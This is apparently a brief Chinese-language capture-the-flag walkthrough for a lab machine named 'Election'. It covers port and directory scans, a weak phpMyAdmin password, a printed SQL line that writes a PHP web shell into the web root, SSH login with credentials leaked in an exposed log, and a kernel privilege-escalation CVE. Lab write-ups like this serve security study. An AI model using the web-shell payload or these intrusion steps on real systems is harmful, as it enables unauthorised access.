Election

usershell

目标IP：192.168.205.132

端口信息

22/tcp open  ssh
80/tcp open  http

web目录扫描

/javascript           (Status: 301) [Size: 323] [--> http://192.168.205.132/javascript/]
/election             (Status: 301) [Size: 321] [--> http://192.168.205.132/election/]
/phpmyadmin           (Status: 301) [Size: 323] [--> http://192.168.205.132/phpmyadmin/]

思路1

PhpMyadmin存在弱口令root:toor

select '<?php system($_GET[cmd]);' into dumpfile "/var/www/html/cmd.php";

写入shell获得www-data权限

思路2

对election目录进行继续扫描，发现一个日志目录

[02:18:15] 200 -  986B  - /election/admin/logs/                             

可以得到一个日志文件system.log，读取日志信息可以发现

[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).

从中可以得到一个凭据love:P@$$w0rd@123，尝试登录electron后台失败，登录ssh成功

获取love权限

rootshell

内核提权CVE-2021-4034